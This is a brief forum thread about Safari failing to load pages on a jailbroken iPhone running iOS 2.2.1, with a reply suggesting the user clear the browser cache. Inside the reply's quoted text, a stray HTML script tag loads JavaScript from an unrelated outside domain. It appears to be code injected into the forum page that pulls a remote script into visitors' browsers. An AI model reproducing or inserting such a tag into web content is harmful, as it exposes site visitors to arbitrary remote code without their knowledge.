Results 1 to 2 of 2

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.


Thread: Strange Safari Problem

  1. #1
    Default Strange Safari Problem
    When I save a image and try to go back to the main page the page won't load. In fact no pages will load in Safari until I restart the phone. Anyone else having this issue? Or have any suggested fixes.

    I'm running 2.2.1 3G J.B. Ive tried to restore but still have same problem. Didn't have this issue on 2.2

    Thanks

    Well looks like I've fixed the problem. I did a restore back to 2.2 then restored up to 2.2.1 now seems to be working fine. not sure what the problem was.

    looks like I spoke too soon its not working again I don't know whats going on I'm out of ideas.


    I had one more idea I tried it in safe mode works fine. hopefully 3.0 will fix this for me.
    Last edited by dangersnert; 03-13-2009 at 09:51 AM.

  2. #2
    Quote Originally Posted by dangersnert View Post
    When I save a image and try to go back to the main page the page won't load. In fact no pages will load in Safari until I restart the phone. Anyone else having this issue? Or have any suggested fixes.

    I'm running 2.2.1 3G J.B. Ive tried to restore but still have same problem. Didn't have this issue on 2.2

    Thanks

    Well looks like I've fixed the problem. I did a restore back to 2.2 then restored up to 2.2.1 now seems to be working fine. not sure what the problem was.

    looks like I spoke too soon its not working again I don't know whats going on I'm out of ideas.


    I had one more idea I tried it in safe mode works fine. hopefully 3.0 will fix this for me.<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    try to delete the cache of the web browser

Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •